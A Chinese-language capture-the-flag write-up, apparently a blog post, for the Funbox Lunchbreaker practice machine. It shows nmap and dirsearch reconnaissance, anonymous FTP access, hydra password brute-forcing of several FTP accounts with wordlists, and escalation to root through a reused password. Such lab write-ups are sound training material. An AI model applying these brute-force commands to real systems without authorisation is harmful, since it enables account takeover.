ftp爆破FunboxLunchbreaker

FunboxLunchbreaker

一次简单的爆破通关

信息收集

扫描靶机ip 192.168.3.134

arp-scan -l

扫描开放端口,扫描出21/22/80端口

nmap -sV -A -p- 192.168.3.134

在这里插入图片描述

21端口开启了ftp,并可以匿名登录,尝试ftp登录下载文件

ftp 192.168.3.134
anonymous

共有3个文件

在这里插入图片描述

下载下来

get .s3cr3t
get supers3cr3t
get wordpress (下载失败)

在这里插入图片描述

查看下载好的两个文件

在这里插入图片描述

分别解码(没有有用的信息)

base64解码:
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds

BrainFuck解码:
Look deep into nature and then you will understand everything better."

接下来对80端口进行探测

访问页面,是一张图片

页面源代码

<img src="image.jpg">   <! webdesign by j.miller [jane@funbox8.ctf] >

在这里插入图片描述

对目录进行扫描,扫描出robots.txt

python dirsearch.py -u http://192.168.3.134/

在这里插入图片描述

what you see what you get 所见即所得(意思是不用扫描了)

那就只有爆破了

ftp爆破

之前在页面源代码中发现了一段注释

 <! webdesign by j.miller [jane@funbox8.ctf] >

jane应该就是用户名,爆破他的账号

hydra 192.168.3.134 ftp -l jane -P rockyou.txt -vV

在这里插入图片描述

得到密码password

登录jane账号,发现keys.txt下载下来

在这里插入图片描述

再去家目录看看其他用户里面有什么

在这里插入图片描述

其他用户目录进不去继续爆破

将这几个用户的名字写成一本字典user.txt

hydra 192.168.3.134 ftp -L user.txt -P /usr/share/wfuzz/wordlist/rockyou.txt -vV

先跑出了jim的账号,登录jim后台继续跑着

在这里插入图片描述

在jim目录下没发现有用的信息

由于john迟迟没跑下来,先爆破下jules直接最大线程跑

hydra 192.168.3.134 ftp -l jules -P rockyou.txt -t64 -vV

在这里插入图片描述

登录jules,发现了几个密码本

在这里插入图片描述

到现在john还没跑下来,用得到的密码本爆破

hydra 192.168.3.134 ftp -l john -P .good-passwd -vV

.good-passwd没跑下来,最后用.bad-passwds跑下来了

hydra 192.168.3.134 ftp -l john -P .bad-passwds -vV

在这里插入图片描述

那边的爆破可以停了

直接ssh登录john

ssh john@192.168.3.134

在这里插入图片描述

说root的密码和john一样

直接切换用户root

su root

在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值